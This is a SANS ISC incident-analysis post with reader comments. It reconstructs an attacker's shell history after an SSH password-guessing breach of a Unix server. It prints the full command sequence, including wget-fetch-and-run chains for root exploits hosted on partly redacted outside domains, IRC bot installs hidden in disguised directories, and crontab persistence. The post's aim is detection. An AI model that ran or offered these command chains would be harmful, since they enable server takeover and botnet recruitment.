Anatomy of a Unix breach - SANS Internet Storm Center

Anatomy of a Unix breach
ISC reader Will wrote in to share a bash_history file from one of his Unix servers that got hacked. Since knowing the command sequence used by the bad guys helps to detect similar intrusions, we are sharing it here in (almost) full length. Some of the sites hosting the used root shell exploits are still live, and hence not included. The whole breach of Will's server started via a password guessing attack against SSH. We have covered this risk repeatedly in ISC diaries. Once the bad guys were in, they ran the commands below, and then apparently used the just installed IRC bots to continue scanning for SSH ports on other systems. Phase#1: Let's find out more about the system that we just broke into `uptime uname -a w ifconfig` Phase#2: Let's download all the Linux root exploits that we have, and just run them. You never know, we might get lucky. Note how some of the TAR files come with an innocent-looking jpg or pdf extension. Hence, if you are filtering certain file types at the perimeter proxy, you better hope that your proxy goes by MIME type an not by extension alone! `wget http://i......go.ro/exploit.jpg;tar xzvf exploit.jpg;rm -rf exploit.jpg;cd exploit;./mv;id wget http://m......co.uk/sandu/ex.tgz ; tar zxvf ex.tgz ; cd e ; chmod +x * ; ./exploit ; id wget http://g......at.ua/2.6.18.tgz;tar zxvf 2.6.18.tgz;rm -rf 2.6.18.tgz;cd uid0;./uid wget http://g......at.ua/expl.pdf;tar zxvf expl.pdf;rm -rf expl.pdf;cd w;./wunderbar_emporium.sh wget http://c......org/god.jpg;tar zxvf god.jpg;rm -rf god.jpg;cd .ICE-UNIX;./autorun;./run` We are not quite sure whether any of the above exploits was successful. The "id" command, or the exploit itself, would have told the attacker whether he had a lucky break. Some of the exploits that we were able to recover start a new shell .. and hence weren't successful, because otherwise the remaining commands would be in the shell history of user "root". Other exploits simply modify the euid (effective userid) of the already running process, and hence wouldn't leave any obvious traces behind in the shell history. In any case .. follows Phase #3a: Install some goodies. virus.tar isn't really a virus, it is a copy of EnergyMech, an IRC bot. Note how the bad guy uses Nano to edit the config file ... which tells us that he/she isn't all that experienced on Unix. A real Unix hacker would most likely use "vi". Note also how he calls the IRC bot "Evolution" when he starts it, likely hoping that an admin would overlook it in a casual investigation. `/sbin/ifconfig -a \| grep inet wget http://f......com/storm12/virus.tar tar xvf virus.tar rm -rf virus.tar cd virus ls -a nano start nano inst chmod +x * ./autorun ./start Evolution` Phase#3b: Install some more goodies. egg.tgz is a copy of Eggdrop, another IRC bot. Note how the bad guy puts the files into a directory called " " (single space). If you want to search for such directories on your system, try this `#find / -name " " -exec ls -aldQ {} ;` `mkdir " " cd " " ls -a wget http://c.......org/egg.tgz cd " " tar zxvf egg.tgz rm -rf egg.tgz cd .access.log ls -a chmod +x * ./eggdrop -m bot1.conf ls -a cd scripts nano respond.tcl pwd` Phase #4: Make sure access can be re-gained by configuring the cron tab to re-start some of the hacker's processes automatically on a schedule. `crontab -l crontab -e exit`	Daniel 385 Posts ISC Handler Jul 31st 2011
Thread locked Subscribe	Jul 31st 2011 1 decade ago
"Hence, if you are filtering certain file types at the perimeter proxy, you better hope that your proxy goes by MIME type an not by extension alone!" MIME type is only a HTTP protocol attribute suggesting how a web browser should interpret the file, it is completely under control of the remote server, and doesn't matter once the file is downloaded. The payload could have a file extension, and a mime type of Image/Jpeg, and it probably will based on how server determines mime type. The user can still use the file as an archive once downloaded.	Mysid 146 Posts
Quote	Jul 31st 2011 1 decade ago
You're right of course .. amended to mention magic bytes. But in any case, since the attackers can run code of their choice, they could transfer ANY format, including encrypted.	Daniel 385 Posts ISC Handler
Quote	Jul 31st 2011 1 decade ago
"Some of the sites hosting the used root shell exploits are still live, and hence not included." Have they been reported to malwaredomains.com so that we can block them at the proxy?	John Hardin 62 Posts
Quote	Aug 1st 2011 1 decade ago
The thing that's interesting to me about this is that the bash history wasn't deleted--that shows real inexperience.	John Hardin 1 Posts
Quote	Aug 1st 2011 1 decade ago
Jordan's right. I was going to say that I usually either find a missing bash_history file, or one containing only a command to redirect history to /dev/null. Another favorite hidden directory scheme is to create a directory named "...' It's easy to miss it below "." and ".." if you don't know to look for it.	Anonymous
Quote	Aug 1st 2011 1 decade ago
I'm biased (both as an OpenSSH author, and Duo founder), but highly recommend setting up duo_unix for two-factor auth. It's free for up to 10 users, and open-source: http://www.duosecurity.com And doesn't even require restarting sshd. User-level access pretty much translates to root these days (kernel bugs a plenty) - but even just protecting admin accounts is a good start...	Anonymous
Quote	Aug 1st 2011 1 decade ago
Would you mind sharing the output of the uname command? Or telling us the flavor of unix it was running?	Anonymous
Quote	Aug 5th 2011 1 decade ago
First line of the diary states: "ISC reader Will wrote in to share a bash_history file ". This analysis is based on the commands run not the output afaik Daniel doesn't know the version of unix nor have the uname output.	donald 206 Posts
Quote	Aug 5th 2011 1 decade ago